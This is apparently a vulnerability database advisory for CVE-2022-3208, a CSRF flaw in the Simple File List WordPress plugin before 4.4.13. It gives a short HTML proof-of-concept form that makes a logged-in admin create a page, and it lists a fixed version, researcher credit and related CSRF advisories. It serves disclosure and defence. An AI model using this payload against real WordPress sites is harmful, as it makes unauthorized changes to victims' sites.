Simple File List < 4.4.13 – Page Creation via CSRF | CVE 2022-3208 | Plugin Vulnerabilities

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin create new page and change it's content via a CSRF attack.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="eeShortcode" value="Page Content" />
      <input type="hidden" name="eeCreatePostType" value="Page" />
      <input type="hidden" name="eeGo" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

simple-file-list

Fixed in 4.4.13

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

80d475ca-b475-4789-8eef-9c4d880853b7

Timeline

Publicly Published

2022-09-19 (about 1 years ago)

Added

2022-09-19 (about 1 years ago)

Last Updated

2022-09-19 (about 1 years ago)

Other

Published

Title

Published

2021-04-22

Title

Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via CSRF

Published

2017-08-08

Title

Loginizer <= 1.3.5 - Cross-Site Request Forgery (CSRF)

Published

2021-03-13

Title

VM Backups <= 1.0 - CSRF to Stored Cross-Site Scripting (XSS)

Published

2023-09-23

Title

Comment Blacklist Updater < 1.2.0 - Cross-Site Request Forgery via update_blacklist_manual

Published

2022-01-27

Title

WP Google Map < 1.8.4 - Arbitrary Post Deletion and Plugin's Settings Update via CSRF